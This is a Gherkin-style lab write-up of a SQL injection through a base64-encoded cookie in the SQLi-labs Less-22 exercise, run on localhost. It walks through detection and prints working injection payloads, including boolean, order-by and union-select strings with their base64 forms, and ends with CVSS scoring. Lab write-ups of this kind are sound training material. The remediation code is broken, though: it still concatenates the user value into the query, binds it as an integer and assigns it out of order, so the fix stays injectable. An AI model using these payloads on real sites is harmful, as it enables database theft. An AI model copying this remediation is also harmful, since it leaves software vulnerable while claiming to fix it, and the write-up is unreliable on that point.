## Version 1.4.1
## language: en

Feature:
  TOE:
    SQLI-labs
  Category:
    SQL Injection - Cookie Injection-Base64 Encoded-Double Quotes
  Location:
    http://localhost/sqlilabs/Less-22/ - uname(field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Verify if the site is vulnerable to SQL Injection
  Recommendation:
    Use Prepared Statements

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Microsoft Windows | 7               |
    | Chrome            | 78.0.3904.70    |
    | EditThisCookie    | 1.5.0           |
    | Wamp server       | 3.1.9 32 bit    |
  TOE information:
    Given I access the main page
    And the page is made with PHP
    And MySQL is the Database Management System
    And the website is running in localhost

  Scenario: Normal use case
    Given I can use a username and password beforehand
    When I access the main page
    Then I see a form with "Username" and "Password" fields
    When I enter the user's credentials
    """
    Username:Dumb
    Password:Dumb
    """
    Then the website shows a new message
    """
    YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
    YOUR IP ADDRESS IS : ::1
    DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
    YOUR COOKIE : uname = RHVtYg== and expires: Mon 23 Dec 2019 - 20:04:51
    Your Login name:Dumb
    Your Password:Dumb
    Your ID:1
    """
    And I can see a button at the bottom of the site
    """
    Delete Your Cookie!
    """
    When I click on the button
    Then I am redirected to the previous form

  Scenario: Static detection
    Given I access the backend code at
    """
    sqlilabs\Less-22\index.php
    """
    When I check the source code
    Then I find a SQL insert query related to username and password
    """
    $sql="SELECT  users.username, users.password FROM users WHERE
    users.username=$uname and users.password=$passwd ORDER BY users.id
    DESC LIMIT 0,1";
    $result1 = mysqli_query($con, $sql);
    $row1 = mysqli_fetch_array($result1, MYSQLI_BOTH);

    if($row1)
        {
        echo '<font color= "#FFFF00" font size = 3 >';
        setcookie('uname', base64_encode($row1['username']), time()+3600);
    """
    And the variable "$sql" is storing a query string
    And I see that the "uname" cookie is created with the query's username
    And I can see that the cookie has a base64 encode
    When there aren't prepared statements in the code
    And the query is stored as a single string
    Then the id parameter is vulnerable to SQL injection

  Scenario: Dynamic detection
    Given I use the EditThisCookie extension as a cookie manager
    When I submit the form using the username "Dumb" and password "Dumb"
    And the website shows a message with user information
    Then I open the cookie manager window
    And I find out that a new cookie was created with its own value
    """
    name: uname
    value: RHVtYg%3D%3D
    """
    When I know the cookie is encoded in base64 from the source code
    Then I decode the current cookie with an online base64 decoder
    And the original value is actually my username
    """
    +---------------+----------------+
    |Original Value | Base64 value   |
    +---------------|----------------+
    |    Dumb       |     RHVtYg==   |
    +---------------+----------------+
    """
    When I can see the cookie value reflected on the website message
    Then I know I can assign a base64 value to the cookie
    When I encode a double quote (") SQL injection in base64
    """
    +---------------+----------------+
    |Original Value | Base64 value   |
    +---------------|----------------+
    |       "       |      Ig==      |
    +---------------+----------------+
    """
    Then I open the cookie manager and enter the encoded injection
    When I refresh the same website
    Then I can see a new SQL error [evidence](img.png)
    When the query's interpretation is broken by my input in the URL
    Then the site is vulnerable to SQL Injection

  Scenario: Exploitation
    Given I must work with double quote (") injections
    When I write a boolean SQL injection with comments
    Then I encode it in base64
    """
    +-----------------+----------------------+
    |  Original Value |     Base64 value     |
    +-----------------+----------------------+
    | 1" or 1=1-- -   | MSIgb3IgMT0xLS0gLQ== |
    +-----------------+----------------------+
    """
    And the previous SQL error dissapears
    When I want to get the number of the columns of the query
    Then I test some injections with "order by" clause
    And I find out a clause without SQL errors
    """
    +--------------------+--------------------------+
    |  Original Value    |      Base64 value        |
    +-----------------+-----------------------------+
    | 1" order by 3-- -  | MSIgb3JkZXIgYnkgMy0tIC0= |
    +--------------------+--------------------------+
    """
    When I make a union based injection
    Then I try to get info about the database and version
    """
    1" union select 1,database(),version()-- -
    """
    And I encode the whole injection
    """
    MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCktLSAt
    """
    When I open the cookie manager window
    Then I inject the previous encoded SQL injection
    When I refresh the website again
    Then I get sensible data from the main message [evidence](img2.png)
    And the website is vulnerable to SQL injection via cookie injection

  Scenario: Remediation
    When the application is executing queries in MySQL
    Then the query code must use prepared statements
    """
    $stmt = $mysqli->prepare("SELECT  users.username FROM users WHERE
    users.username=$uname")

    $uname = $_POST['uname']
    $stmt->bind_param("i", $uname)

    $stmt->execute()
    """
    And the code can prevent SQL Injection

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.7/10 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    7.1/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.8/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L

  Scenario: Correlations
    No correlations have been found to this date 2019-12-23
